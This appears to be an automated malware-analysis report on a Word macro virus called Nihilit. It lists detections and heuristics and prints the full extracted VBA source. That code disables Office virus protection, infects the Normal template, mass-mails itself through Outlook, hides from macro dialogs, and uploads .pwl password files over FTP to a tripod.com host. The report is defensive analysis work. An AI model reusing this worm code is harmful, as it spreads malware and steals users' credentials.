MALICIOUS
458
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1105 Ingress Tool Transfer
The sample contains legacy WordBasic and VBA macros, including an AutoClose macro that executes a function named 'Nihilit'. This function disables security features, exports a component to 'C:\Windows\Nihilit.drv', saves the document as 'C:\Windows\Nihilit.doc', and attempts to use Outlook to send emails, likely as a propagation mechanism. The presence of 'Shell()' and 'CreateObject()' calls, along with the ClamAV detection of 'Win.Trojan.Psycho-3', strongly indicates malicious intent for downloading and executing further payloads.
Heuristics 11
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
shell "ftp http://members.tripod.com/Nihilit/" -
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
.VirusProtection = False -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set Ni_msg = Ni_OApp.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Ni_OApp = CreateObject("Outlook.Application") -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc" -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://members.tripod.com/Nihilit/A@� In document text (OLE body)
- http://members.tripod.com/Nihilit/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4169 bytes |
SHA-256: 35891f5cb7ce107048917734b211cf6f5be8bf012f1dc14981fd6b0ebb1dc3a7 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
Sub AutoClose()
On Error Resume Next
' Nihilit v2.0 by Necronomikon |[ShadowvX],[Devilport-Systems]
' based on Jackal by WalruS
Call Nihilit
End Sub
Sub Nihilit()
On Error Resume Next
With Options
.VirusProtection = False
.ConfirmConversions = False
.SaveNormalPrompt = False
End With
Application.DisplayAlerts = wdAlertsNone
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
ActiveDocument.ReadOnlyRecommended = False
If NormalTemplate.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents("Nihilit").Export ("C:\Windows\Nihilit.drv")
SetAttr "C:\Windows\Nihilit.drv", 6
End If
ActiveDocument.SaveAs FileName:="C:\Windows\Nihilit.doc", FileFormat:=wdFormatDocument
Set Ni_OApp = CreateObject("Outlook.Application")
Set Ni_Mapi = Ni_OApp.GetNameSpace("MAPI")
For Each Ni_AddList In Ni_Mapi.AddressLists
Next
If Ni_AddList.AddressEntries.Count <> 0 Then
For Ni_AddListCount = 1 To Ni_AddList.AddressEntries.Count
Next
Set Ni_AddListEntry = Ni_AddList.AddressEntries(Ni_AddListCount)
Set Ni_msg = Ni_OApp.CreateItem(0)
Ni_msg.To = Ni_AddListEntry.Address
Ni_msg.Subject = "Check this!!!"
Ni_msg.Body = "I like this story!!!;o)." + vbCrLf + "Nihilit"
Ni_msg.Attachments.Add Environ("WINDIR") & "\Nihilit.doc"
Ni_msg.DeleteAfterSubmit = True
If Ni_msg.To <> "" Then
Ni_msg.Send
End If
Call InfectDocument
If Month(Now) = Day(Now) Then Call Pwdstealer
NormalTemplate.Saved = True
End If
End Sub
Sub InfectDocument()
On Error Resume Next
If ActiveDocument.VBProject.VBComponents.Item("Nihilit").Name <> "Nihilit" Then
ActiveDocument.VBProject.VBComponents.import ("C:\Windows\Nihilit.drv")
ActiveDocument.Save
End If
End Sub
Sub Pwdstealer()
On Error Resume Next
With Application.FileSearch
.FileName = "*.pwl"
.LookIn = "c:"
.Execute
For i = 1 To .FoundFiles.Count
shell "ftp http://members.tripod.com/Nihilit/"
shell "nihilit"
shell "killer"
shell "post" & .FoundFiles(i)
shell "bye"
Next i
End With
End Sub
Sub ToolsOptions()
On Error Resume Next
Options.VirusProtection = 1
Options.SaveNormalPrompt = 1
Dialogs(wdDialogToolsOptions).Show
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0
End Sub
Sub ToolsSecurity()
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = True
Dialogs(wdDialogToolsSecurity).Show
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub
Sub FileTemplates()
End Sub
Sub ToolsMacro()
Call Stealth
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
Call Stealth
ShowVisualBasicEditor = True
End Sub
Sub Stealth()
On Error Resume Next
Application.OrganizerDelete Source:=NormalTemplate.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
Application.OrganizerDelete Source:=ActiveDocument.Name, _
Name:="Nihilit", Object:=wdOrganizerObjectProjectItems
NormalTemplate.Saved = True
ActiveDocument.Saved = True
End Sub
Sub HelpAbout()
WordBasic.FileNew
WordBasic.ToggleFull
WordBasic.DocMaximize
WordBasic.Font "Comic Sans MS"
WordBasic.FontSize 60
WordBasic.Bold
WordBasic.Insert "Check this!"
WordBasic.StartOfLine
WordBasic.CharRight 1, 1
WordBasic.FormatFont Points:="48", Color:=6
WordBasic.EndOfLine
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 48
WordBasic.Insert "Nihilit was coded by Necronomikon."
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.